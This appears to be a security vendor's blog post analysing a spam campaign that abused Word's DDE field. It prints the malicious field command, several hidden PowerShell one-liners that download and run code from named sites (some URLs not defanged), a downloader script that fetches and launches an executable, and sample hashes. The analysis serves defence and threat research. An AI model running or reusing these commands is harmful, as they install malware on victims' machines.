In the last few hours, we have detected a spam campaing targeting companies and making use of a new zero-day exploit in Microsoft’s Dynamic Data Exchange (DDE) protocol. This is a very dangerous attack since commands can be executed in Word with no OLE objetcs or macros needed. All our clients are proactively protected and updating will not be necessary thanks to Adaptive Defense 360.

Behavior

The email comes with an attached document. When opening the Word document, the first thing we see is the following message:

If we click “Yes”, the following message appears:

Next, the following message appears:

The document (sample 0910541C2AC975A49A28D7A939E48CD3) contains two pages. The first is blank, the second contains just a short message in Russian: “Error! Section unspecified.”

If we right-click the text, we can see that there is an associated field code:

If we click “Edit field”, we find the command used to exploit the vulnerability and allow the code to execute:

DDE C:\\Windows\\System32\\cmd.exe “/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘hxxp://arkberg-design.fi/KJHDhbje71’);powershell -e $e “

 

Here is a screen shot of the process tree that is generated if the exploit is executed properly:

Here are some of the files used in this campaign:

  • I_215854.doc
  • I_563435.doc
  • I_847923.doc
  • I_949842.doc
  • I_516947.doc
  • I_505075.doc
  • I_875517.doc
  • DC0005845.doc
  • DC000034.doc
  • DC000873.doc
  • I_958223.doc
  • I_224600.doc
  • I_510287.doc
  • I_959819.doc
  • I_615989.doc
  • I_839063.doc
  • I_141519.doc

Commands to be Executed

Depending on which simple is analyzed, we can see that the download URL changes, despite the command being essentially the same.

Sample 0910541C2AC975A49A28D7A939E48CD3

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://arkberg-design.fi/KJHDhbje71’)~powershell -e $e

Sample 19CD38411C58F5441969E039204C3007

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://ryanbaptistchurch.com/KJHDhbje71’)~powershell -e $e

Sample 96284109C58728ED0B7E4A1229825448

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://vithos.de/hjergf76’)~powershell -e $e

Sample 1CB9A32AF5B30AA26D6198C8B5C46168

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://alexandradickman.com/KJHDhbje71’)~powershell -e $e

The following powershell script is downloaded and executed:

$urls = “hxxp://shamanic-extracts.biz/eurgf837or”,”hxxp://centralbaptistchurchnj.org/eurgf837or”,””,”hxxp://conxibit.com/eurgf837or”

foreach($url in $urls){

Try

{

Write-Host $url

$fp = “$env:temp\rekakva32.exe”

Write-Host $fp

$wc = New-Object System.Net.WebClient

$wc.DownloadFile($url, $fp)

Start-Process $fp

break

}

Catch

{

Write-Host $_.Exception.Message

}

}

From this URL:

hxxp://shamanic-extracts.biz/eurgf837or

And a Trojan is downloaded (4F03E360BE488A3811D40C113292BC01).

MD5s from the Word document:

0910541C2AC975A49A28D7A939E48CD3
19CD38411C58F5441969E039204C3007
96284109C58728ED0B7E4A1229825448
1CB9A32AF5B30AA26D6198C8B5C46168